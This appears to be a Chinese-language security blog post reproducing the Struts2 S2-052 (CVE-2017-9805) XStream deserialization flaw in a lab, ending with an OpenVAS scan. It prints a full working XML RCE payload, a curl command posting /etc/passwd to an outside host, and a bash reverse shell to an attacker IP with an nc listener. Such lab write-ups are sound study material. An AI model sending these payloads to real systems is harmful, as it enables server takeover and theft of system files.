<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.8.0">
    <meta name="referrer" content="no-referrer">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
	<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
    <meta name="description" content="龅牙晴在 Github 上的个人博客">
    <meta name="keyword" content="安全，漏洞挖掘，漏洞复现">
    <meta name="theme-color" content="#600090">
    <meta name="msapplication-navbutton-color" content="#600090">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="#600090">
    <link rel="shortcut icon" href="https://upload-images.jianshu.io/upload_images/6269327-54939abc2f06655f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
    <link rel="alternate" type="application/atom+xml" title="折戟" href="/atom.xml">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.css">
    <title>
        
        Struts2-052漏洞学习及反弹shell试验｜R_song&#39;s blog
        
    </title>

    <link rel="canonical" href="https://XD0ne.github.io/2017/11/14/4. Struts2-052漏洞学习及反弹shell试验/">

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="/css/bootstrap.min.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/blog-style.css">

    <!-- Pygments Github CSS -->
    <link rel="stylesheet" href="/css/syntax.css">
</head>


<style>

    header.intro-header {
        background-image: url('https://upload-images.jianshu.io/upload_images/6269327-c23742a390edde52.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240')
    }
</style>
<!-- hack iOS CSS :active style -->
<body ontouchstart="" class="animated fadeIn">
<!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top " id="nav-top" data-ispost="true" data-istags="false
" data-ishome="false">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand animated pulse" href="/">
                <span class="brand-logo">
                    折戟
                </span>
                's Blog
            </a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
        <!-- /.navbar-collapse -->
        <div id="huxblog_navbar">
            <div class="navbar-collapse">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="/">Home</a>
                    </li>
					
                    
                        
							
								
							
						
                    
                        
							
                        <li>
                            <a href="/categories/">categories</a>
                        </li>
							
						
                    
                        
							
                        <li>
                            <a href="/tags/">tags</a>
                        </li>
							
						
                    
					
					
						<li>
							<a href="/about">About</a>
						</li>
					
                </ul>
            </div>
        </div>
    </div>
    <!-- /.container -->
</nav>
<script>
    // Drop Bootstarp low-performance Navbar
    // Use customize navbar with high-quality material design animation
    // in high-perf jank-free CSS3 implementation
//    var $body   = document.body;
    var $toggle = document.querySelector('.navbar-toggle');
    var $navbar = document.querySelector('#huxblog_navbar');
    var $collapse = document.querySelector('.navbar-collapse');

    $toggle.addEventListener('click', handleMagic)
    function handleMagic(e){
        if ($navbar.className.indexOf('in') > 0) {
        // CLOSE
            $navbar.className = " ";
            // wait until animation end.
            setTimeout(function(){
                // prevent frequently toggle
                if($navbar.className.indexOf('in') < 0) {
                    $collapse.style.height = "0px"
                }
            },400)
        }else{
        // OPEN
            $collapse.style.height = "auto"
            $navbar.className += " in";
        }
    }
</script>

<!-- Main Content -->
<meta name="referrer" content="no-referrer">
<!--only post-->


<img class="wechat-title-img" src="https://upload-images.jianshu.io/upload_images/6269327-c23742a390edde52.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">


<style>
    
    header.intro-header {
        background-image: url('https://upload-images.jianshu.io/upload_images/6269327-c23742a390edde52.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240')
    }

    
</style>

<header class="intro-header">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1 text-center">
                <div class="post-heading">
                    <h1>Struts2-052漏洞学习及反弹shell试验</h1>
                    
                    <span class="meta">
                         作者 折戟
                        <span>
                          日期 2017-11-14
                         </span>
                    </span>
                    <div class="tags text-center">
                        
                        <a class="tag" href="/tags/#struts2-052" title="struts2-052">struts2-052</a>
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="post-title-haojen">
        <span>
            Struts2-052漏洞学习及反弹shell试验
        </span>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">
            <!-- Post Container -->
            <div class="col-lg-8 col-lg-offset-1 col-sm-9 post-container">
                <h2 id><a href="#" class="headerlink" title></a><meta name="referrer" content="no-referrer"></h2><h1 id="Struts2-052漏洞学习"><a href="#Struts2-052漏洞学习" class="headerlink" title="Struts2-052漏洞学习"></a>Struts2-052漏洞学习</h1><hr>
<h2 id="了解漏洞"><a href="#了解漏洞" class="headerlink" title="了解漏洞"></a>了解漏洞</h2><h3 id="Struts是什么？"><a href="#Struts是什么？" class="headerlink" title="Struts是什么？"></a>Struts是什么？</h3><p>Struts是一个特别常用的开源web框架，用于扩展JAVA Servlet API并使用了模型（M），视图（V），控制（C）体系结构。使用这个框架，我们可以用各种标准技术（如 JSP、JavaBeans、XML等）创建可维护、可扩展并且灵活的 Web 应用程序。可以说用struts来开发java web应用程序是很简单，但是效率又很高。<br>之后，Struts的Java EE Web框架的团体，决定合作共同开发一个新的，整合了WebWork与Struts优点，并且更加优雅、扩展性更强的框架，命名为“Struts 2”，原Struts的1.x版本产品称为“Struts 1”。Struts项目并行提供与维护两个主要版本的框架产品——Struts 1与Struts 2。所以struts项目的两个产品就是 struts1和struts 2。<br>维基百科：“它通过采用Java Servlet／JSP技术，实现了基于Java EE Web应用的Model-View-Controller（MVC）设计模式的应用框架，是MVC经典设计模式中的一个经典产品。”<br>使用 Struts 时，此框架将为您提供一个控制器 Servlet (ActionServlet)，它在 IDE 中包含的 Struts 库中定义，并自动在 web.xml 部署描述符中注册，就下面这个：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-508e98961b35075e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1.png"><br>该控制器 Servlet 使用 struts-config.xml 文件将传入请求映射到 Struts Action 对象，并实例化与暂时存储窗体数据的操作相关联的任何 ActionForm 对象。Action 对象在使用窗体 Bean 中存储的任何数据的同时，使用其 execute 方法处理请求。一旦 Action 对象处理了请求，它就将存储任何新数据（即，存储在窗体 Bean 或单独的结果 Bean 中），并将结果转发到相应的视图中。</p>
<h3 id="Struts2-052是什么漏洞？"><a href="#Struts2-052是什么漏洞？" class="headerlink" title="Struts2-052是什么漏洞？"></a>Struts2-052是什么漏洞？</h3><p>s2-052漏洞是当用户使用带有XStream组件的Struts-REST插件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，可直接在数据包中插入恶意代码。导致攻击者可以构造恶意xml payload导致RCE（远程代码执行）。<br>相对于之前struts2爆出来的漏洞来说，s_052漏洞危害稍微小一些，因为利用环境比较苛刻，需要使用Struts2 REST插件的XStream组件。<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">·	漏洞描述：Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击。</span><br><span class="line">·	漏洞编号：CVE-2017-9805</span><br><span class="line">·	漏洞作者：lgtm.com的安全研究员</span><br><span class="line">·	影响版本：Version 2.5.0 to 2.5.12 和 Version 2.3.0 to 2.3.33</span><br><span class="line">·	漏洞等级：高危</span><br></pre></td></tr></table></figure></p>
<h2 id="分析漏洞原理"><a href="#分析漏洞原理" class="headerlink" title="分析漏洞原理"></a>分析漏洞原理</h2><h3 id="struct2-052漏洞产生的原因是什么？"><a href="#struct2-052漏洞产生的原因是什么？" class="headerlink" title="struct2-052漏洞产生的原因是什么？"></a>struct2-052漏洞产生的原因是什么？</h3><p>这个漏洞触发点是REST插件在解析请求中的xml文件时，调用了XStreamHandler，传入的数据会被默认进行反序列化，进行反序列化操作时，未对数据内容进行有效验证，可直接在数据包中插入恶意代码，如果当传入的xml是个经过XStream序列化的恶意对象时，便造成反序列化漏洞。<br>其实简单来说原因有两个：一个是 Struts2 REST插件(struts2-rest-plugin-2.x.jar)本身没有对进入的数据进行安全检查，导致攻击者可以传入恶意的xml对象可以传入到XStream里。另一个是XStream在反序列化传入的xml造成的远程代码执行。</p>
<h3 id="一个系统存在这个漏洞会导致什么后果？"><a href="#一个系统存在这个漏洞会导致什么后果？" class="headerlink" title="一个系统存在这个漏洞会导致什么后果？"></a>一个系统存在这个漏洞会导致什么后果？</h3><p>当使用带有XStream处理程序的Struts REST插件来处理XML有效负载时，可能会发生远程执行代码攻击。这会使攻击者可以通过任意恶意代码来接管服务器，获取服务器的权限。比如说执行一些eyi代，把木马文件写入服务器的主目录！写入主目录，这很可怕，写入小马之后获取权限。最后导致服务器被攻击者控制，造成信息泄露等，甚至攻击者利用服务器进行其他非法操作，利用该服务器攻击等。</p>
<h2 id="漏洞的重现和利用"><a href="#漏洞的重现和利用" class="headerlink" title="漏洞的重现和利用"></a>漏洞的重现和利用</h2><h3 id="下载java并配置环境"><a href="#下载java并配置环境" class="headerlink" title="下载java并配置环境"></a>下载java并配置环境</h3><p>这个应该很多朋友都做过，所以我也很早都已经配置好了，所以展示一下代码和配置环境变量的操作：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ yum install java*jdk*devel*   //使用模糊匹配，搜索然后下载指定版本的</span><br><span class="line">$ //下载搜索到的最新的</span><br><span class="line">$ //这样的话就不用进行环境变量配置了</span><br></pre></td></tr></table></figure></p>
<p>还可以直接去sun网站上下载java然后手动安装，但需要修改环境变量。在/etc/profile.d/文件夹下添加一个java.sh文件，或者修改/etc/profile文件，两种方式都在文件中添加入java的classpath和path，然后输入命令：source  /etc/profile，即可使配置生效。</p>
<h3 id="下载tomcat并配置"><a href="#下载tomcat并配置" class="headerlink" title="下载tomcat并配置"></a>下载tomcat并配置</h3><p>执行命令：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ sudo dnf install tomcat</span><br><span class="line">$ systemctl start tomcat</span><br></pre></td></tr></table></figure></p>
<p>然后需要在 /usr/share/tomcat/webapps目录下创建一个目录为ROOT（必须大写），然后访问127.0.0.1:8080便可以访问，但是因为里面是空的所以显示404，但是可以看到tomcat服务器信息：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-bda188ed7e155fb5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="2.png"><br>最好是去官网下载对应的版本的tomcat的提示成功页面，网上下载后把下载的包里的webapps文件夹导入到虚拟机中的webapps目录就行。如果像我这样虽然tomcat成功配置了但是很可能导致后面openvas无法扫描到漏洞。官网下载对应版本的地址：<a href="http://tomcat.apache.org/，网站左边可以选择对应版本下载" target="_blank" rel="noopener">http://tomcat.apache.org/，网站左边可以选择对应版本下载</a><br>配置文件在 /etc/tomcat/tomcat.conf</p>
<h3 id="下载存在漏洞的struct2框架版本"><a href="#下载存在漏洞的struct2框架版本" class="headerlink" title="下载存在漏洞的struct2框架版本"></a>下载存在漏洞的struct2框架版本</h3><p>去官网下载该漏洞影响的最后一个版本的struts2框架，struts-2.5.12，然后解压后将apps目录下的struts2-rest-showcase.war和struts2-showcase.war文件放到webapps目录下（/Library/Tomcat/webapps）重启tomcat后访问：<br><a href="http://127.0.0.1:8080/struts2-rest-showcase/" target="_blank" rel="noopener">http://127.0.0.1:8080/struts2-rest-showcase/</a><br><img src="http://upload-images.jianshu.io/upload_images/6269327-f2641781e53fcae9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="222.png"><br>可以看到已经搭建成功了。但是我进行操作时比如点击用户后的view进行操作时跳转404，经过测试只有切换成root用户之间登录fedora后才能进行操作。</p>
<h3 id="生成攻击payload"><a href="#生成攻击payload" class="headerlink" title="生成攻击payload"></a>生成攻击payload</h3><p>在操作页面编辑后点击submit，然后使用firefox编辑重发：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-43d5691268d9b30e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="3.png"><br>将消息头中更改：<br>执行命令：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ Content-Type: application/xml</span><br></pre></td></tr></table></figure></p>
<p>更改request body为：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;map&gt;</span><br><span class="line">&lt;entry&gt;</span><br><span class="line">&lt;jdk.nashorn.internal.objects.NativeString&gt; &lt;flags&gt;0&lt;/flags&gt; &lt;value class=<span class="string">"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"</span>&gt; &lt;dataHandler&gt; &lt;dataSource class=<span class="string">"com.sun.xml.internal.ws.encoding.xml.XMLMessage<span class="variable">$XmlDataSource</span>"</span>&gt; &lt;is class=<span class="string">"javax.crypto.CipherInputStream"</span>&gt; &lt;cipher class=<span class="string">"javax.crypto.NullCipher"</span>&gt; &lt;initialized&gt;<span class="literal">false</span>&lt;/initialized&gt; &lt;opmode&gt;0&lt;/opmode&gt; &lt;serviceIterator class=<span class="string">"javax.imageio.spi.FilterIterator"</span>&gt; &lt;iter class=<span class="string">"javax.imageio.spi.FilterIterator"</span>&gt; &lt;iter class=<span class="string">"java.util.Collections<span class="variable">$EmptyIterator</span>"</span>/&gt; &lt;next class=<span class="string">"java.lang.ProcessBuilder"</span>&gt; &lt;<span class="built_in">command</span>&gt;&lt;string&gt;/usr/bin/touch&lt;/string&gt;&lt;string&gt;/tmp/<span class="built_in">test</span>&lt;/string&gt; &lt;/<span class="built_in">command</span>&gt; &lt;redirectErrorStream&gt;<span class="literal">false</span>&lt;/redirectErrorStream&gt; &lt;/next&gt; &lt;/iter&gt; &lt;filter class=<span class="string">"javax.imageio.ImageIO<span class="variable">$ContainsFilter</span>"</span>&gt; &lt;method&gt; &lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt; &lt;name&gt;start&lt;/name&gt; &lt;parameter-types/&gt; &lt;/method&gt; &lt;name&gt;foo&lt;/name&gt; &lt;/filter&gt; &lt;next class=<span class="string">"string"</span>&gt;foo&lt;/next&gt; &lt;/serviceIterator&gt; &lt;lock/&gt; &lt;/cipher&gt; &lt;input class=<span class="string">"java.lang.ProcessBuilder<span class="variable">$NullInputStream</span>"</span>/&gt; &lt;ibuffer&gt;&lt;/ibuffer&gt; &lt;<span class="keyword">done</span>&gt;<span class="literal">false</span>&lt;/<span class="keyword">done</span>&gt; &lt;ostart&gt;0&lt;/ostart&gt; &lt;ofinish&gt;0&lt;/ofinish&gt; &lt;closed&gt;<span class="literal">false</span>&lt;/closed&gt; &lt;/is&gt; &lt;consumed&gt;<span class="literal">false</span>&lt;/consumed&gt; &lt;/dataSource&gt; &lt;transferFlavors/&gt; &lt;/dataHandler&gt; &lt;dataLen&gt;0&lt;/dataLen&gt; &lt;/value&gt; &lt;/jdk.nashorn.internal.objects.NativeString&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=<span class="string">"../jdk.nashorn.internal.objects.NativeString"</span>/&gt; &lt;/entry&gt; &lt;entry&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=<span class="string">"../../entry/jdk.nashorn.internal.objects.NativeString"</span>/&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=<span class="string">"../../entry/jdk.nashorn.internal.objects.NativeString"</span>/&gt;</span><br><span class="line">&lt;/entry&gt;</span><br><span class="line">&lt;/map&gt;</span><br></pre></td></tr></table></figure></p>
<p>Body内容中的意思是在在tmp文件夹下面生成一个test文件。编辑重发后到指定目录检查：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-ca23173b3e0218df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="4.png"><br>成功生成了test文件；说明远程代码执行成功。验证了可以远程执行代码（RCE）攻击。</p>
<h3 id="使用burpsuite进行截包重发，查看结果"><a href="#使用burpsuite进行截包重发，查看结果" class="headerlink" title="使用burpsuite进行截包重发，查看结果"></a>使用burpsuite进行截包重发，查看结果</h3><p>首先下载安装bp：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ wget http://labfile.oss.aliyuncs.com/courses/726/burpsuite_free.jar</span><br></pre></td></tr></table></figure></p>
<p>打开：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ /usr/bin/java -Xmx2g  -jar  burpsuite_free.jar</span><br></pre></td></tr></table></figure></p>
<p>设置firefox代理127.0.0.1:8080<br>注意firefox设置代理时要把下面的localhost和127.0.01关掉。<br>bp监听127.0.0.0:8080，如果点不了就是端口冲突，被占用了，换端口就行<br><img src="http://upload-images.jianshu.io/upload_images/6269327-a4e3b64771ce3fe5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="5.png"><br>然后进行抓包重发：<br>更改headers中更改Content-Type: application/xml<br>并将body中的更改为payload：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-c201fbf8a0d10070.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="6.png"><br>我重新发送的远程执行代码是要在/tmp下新建一个vuln文件。<br>Payload：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;map&gt;</span><br><span class="line">&lt;entry&gt;</span><br><span class="line">&lt;jdk.nashorn.internal.objects.NativeString&gt; &lt;flags&gt;0&lt;/flags&gt; &lt;value class=<span class="string">"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"</span>&gt; &lt;dataHandler&gt; &lt;dataSource class=<span class="string">"com.sun.xml.internal.ws.encoding.xml.XMLMessage<span class="variable">$XmlDataSource</span>"</span>&gt; &lt;is class=<span class="string">"javax.crypto.CipherInputStream"</span>&gt; &lt;cipher class=<span class="string">"javax.crypto.NullCipher"</span>&gt; &lt;initialized&gt;<span class="literal">false</span>&lt;/initialized&gt; &lt;opmode&gt;0&lt;/opmode&gt; &lt;serviceIterator class=<span class="string">"javax.imageio.spi.FilterIterator"</span>&gt; &lt;iter class=<span class="string">"javax.imageio.spi.FilterIterator"</span>&gt; &lt;iter class=<span class="string">"java.util.Collections<span class="variable">$EmptyIterator</span>"</span>/&gt; &lt;next class=<span class="string">"java.lang.ProcessBuilder"</span>&gt; &lt;<span class="built_in">command</span>&gt;&lt;string&gt;/usr/bin/touch&lt;/string&gt;&lt;string&gt;/tmp/vuln&lt;/string&gt; &lt;/<span class="built_in">command</span>&gt; &lt;redirectErrorStream&gt;<span class="literal">false</span>&lt;/redirectErrorStream&gt; &lt;/next&gt; &lt;/iter&gt; &lt;filter class=<span class="string">"javax.imageio.ImageIO<span class="variable">$ContainsFilter</span>"</span>&gt; &lt;method&gt; &lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt; &lt;name&gt;start&lt;/name&gt; &lt;parameter-types/&gt; &lt;/method&gt; &lt;name&gt;foo&lt;/name&gt; &lt;/filter&gt; &lt;next class=<span class="string">"string"</span>&gt;foo&lt;/next&gt; &lt;/serviceIterator&gt; &lt;lock/&gt; &lt;/cipher&gt; &lt;input class=<span class="string">"java.lang.ProcessBuilder<span class="variable">$NullInputStream</span>"</span>/&gt; &lt;ibuffer&gt;&lt;/ibuffer&gt; &lt;<span class="keyword">done</span>&gt;<span class="literal">false</span>&lt;/<span class="keyword">done</span>&gt; &lt;ostart&gt;0&lt;/ostart&gt; &lt;ofinish&gt;0&lt;/ofinish&gt; &lt;closed&gt;<span class="literal">false</span>&lt;/closed&gt; &lt;/is&gt; &lt;consumed&gt;<span class="literal">false</span>&lt;/consumed&gt; &lt;/dataSource&gt; &lt;transferFlavors/&gt; &lt;/dataHandler&gt; &lt;dataLen&gt;0&lt;/dataLen&gt; &lt;/value&gt; &lt;/jdk.nashorn.internal.objects.NativeString&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=<span class="string">"../jdk.nashorn.internal.objects.NativeString"</span>/&gt; &lt;/entry&gt; &lt;entry&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=<span class="string">"../../entry/jdk.nashorn.internal.objects.NativeString"</span>/&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=<span class="string">"../../entry/jdk.nashorn.internal.objects.NativeString"</span>/&gt;</span><br><span class="line">&lt;/entry&gt;</span><br><span class="line">&lt;/map&gt;</span><br></pre></td></tr></table></figure></p>
<p>执行后去指定文件夹查看：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-1e926d0b31efc0df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="7.png"><br>可以看到payload执行成功。</p>
<h3 id="Payload的大概规则"><a href="#Payload的大概规则" class="headerlink" title="Payload的大概规则"></a>Payload的大概规则</h3><p>在网上寻找了如何写payload的大概规则：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;touch /tmp/test.txt&lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>比如上面这样的是不会执行的，如果远程执行的命令有空格则需要用string进行转换<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;<span class="built_in">echo</span>&lt;/string&gt;</span><br><span class="line">&lt;string&gt;abc&lt;/string&gt;</span><br><span class="line">&lt;string&gt;&gt;&lt;/string&gt;</span><br><span class="line">&lt;string&gt;/tmp/abc&lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>这样也是不行的，应该是不支持重定向符号&gt;，管道符 | 应该也不支持。<br>下面看看一些成功的例子：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;cp&lt;/string&gt;</span><br><span class="line">&lt;string&gt;/etc/passwd&lt;/string&gt;</span><br><span class="line">&lt;string&gt;/tmp/passwd&lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>或者<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;curl&lt;/string&gt;</span><br><span class="line">&lt;string&gt;-F&lt;/string&gt;</span><br><span class="line">&lt;string&gt;value=@/etc/passwd&lt;/string&gt;</span><br><span class="line">&lt;string&gt; http://x.x.x.x/ &lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>curl命令执行可以成功，注意第三行<sting>的值不能有双引号，否则失败。<br>读取文件：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;curl&lt;/string&gt;</span><br><span class="line">&lt;string&gt;-F&lt;/string&gt;</span><br><span class="line">&lt;string&gt;value=@/etc/passwd&lt;/string&gt;</span><br><span class="line">&lt;string&gt; http://x.x.x.x/ &lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></sting></p>
<p>通过在服务端<a href="http://x.x.x.x/抓包，发现/etc/passwd被post了过来。" target="_blank" rel="noopener">http://x.x.x.x/抓包，发现/etc/passwd被post了过来。</a></p>
<h3 id="尝试反弹shell"><a href="#尝试反弹shell" class="headerlink" title="尝试反弹shell"></a>尝试反弹shell</h3><p>首先尝试bash –c这个命令：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;bash&lt;/string&gt;</span><br><span class="line">&lt;string&gt;-c&lt;/string&gt;</span><br><span class="line">&lt;string&gt;touch /tmp/abc.txt&lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>利用firefox抓包重发后，返回500：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-6f100a041e96f4a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="8.png"><br>我们进入指定文件夹看看有没有写入成功：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-429ab44fe9449fa3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="9.png"><br>成功写入，说明了bush 命令可以执行。<br>使用重定向符号&gt;创建任意文件<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;bash&lt;/string&gt;</span><br><span class="line">&lt;string&gt;-c&lt;/string&gt;</span><br><span class="line">&lt;string&gt;<span class="built_in">echo</span> abcd &gt;/tmp/abcd.txt&lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>进入查看：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-c07fecede473f26c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="10.png"><br>成功！<br>可以把ip addr的命令执行结果输出到/tmp/ip.txt<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;bash&lt;/string&gt;</span><br><span class="line">&lt;string&gt;-c&lt;/string&gt;</span><br><span class="line">&lt;string&gt;ip addr &gt;/tmp/ip.txt&lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>查看：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-3b3f2cd46d45d60f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="11.png"><br>成功，查看一下写入情况：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-cc259505a235e9ef.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="12_LI.jpg"><br>全部导出了得到了！<br>下面开始尝试反弹shell，利用下面的命令：（&amp;要转换成&amp;amp）:<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;<span class="built_in">command</span>&gt;</span><br><span class="line">&lt;string&gt;bash&lt;/string&gt;</span><br><span class="line">&lt;string&gt;-c&lt;/string&gt;</span><br><span class="line">&lt;string&gt;bash -i &gt;&amp;amp; /dev/tcp/192.168.72.141/22222 0&gt;&amp;amp;1&lt;/string&gt;</span><br><span class="line">&lt;/<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>在firefox编辑重发之前先要监听一个端口：<br><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ nc –lvvp 22222   //port</span><br></pre></td></tr></table></figure></p>
<p>Firefox编辑重发后，上面填的是攻击方的ip和端口号就可以连接啦！：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-8059257cadd155cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="13.png"><br>成功反弹shell！</p>
<h3 id="试分析如果公司服务器存在这种漏洞，会对公司有什么影响？"><a href="#试分析如果公司服务器存在这种漏洞，会对公司有什么影响？" class="headerlink" title="试分析如果公司服务器存在这种漏洞，会对公司有什么影响？"></a>试分析如果公司服务器存在这种漏洞，会对公司有什么影响？</h3><p>我们尝试了可以远程执行命令成功，结合我们上个实验，如果我们写入一个木马到目标用户的指定路径下，则可进行进一步的攻击操作。比如写入反弹shell等等。攻击者可以进行各种操作从而获取服务器的给权限，并生成后门。便可进行一些非法操作，给公司造成包括信息泄露在内的巨大损失。</p>
<h2 id="使用openvas对该存在的漏洞系统进行扫描"><a href="#使用openvas对该存在的漏洞系统进行扫描" class="headerlink" title="使用openvas对该存在的漏洞系统进行扫描"></a>使用openvas对该存在的漏洞系统进行扫描</h2><h3 id="查看扫描结果，是否能得到对该漏洞的报告？"><a href="#查看扫描结果，是否能得到对该漏洞的报告？" class="headerlink" title="查看扫描结果，是否能得到对该漏洞的报告？"></a>查看扫描结果，是否能得到对该漏洞的报告？</h3><p><img src="http://upload-images.jianshu.io/upload_images/6269327-f0c7d5bcbf55003a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="14.png"><br><img src="http://upload-images.jianshu.io/upload_images/6269327-742ff3e4cbe88ec8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="15.png"><br>我们分别点开进入扫到了两个tomcat分析看到应该是第二个是对应的struts2-052漏洞，会导致远程代码执行漏洞：<br><img src="http://upload-images.jianshu.io/upload_images/6269327-11f3ba2bf0a63857.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="16.png"><br>在博主之前的博客说过如何查找nvt对应的文件，所以这里就不说了。<br><img src="http://upload-images.jianshu.io/upload_images/6269327-21f819f69e771673.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="18.png"><br>源码分析：<br>首先源码的前一段是输出了漏洞的信息，然后<br><img src="http://upload-images.jianshu.io/upload_images/6269327-ab7823d2e9a7e277.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="19.png"><br>这边是提供下面所要调用的函数。<br><img src="http://upload-images.jianshu.io/upload_images/6269327-793372d08a25f6cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" 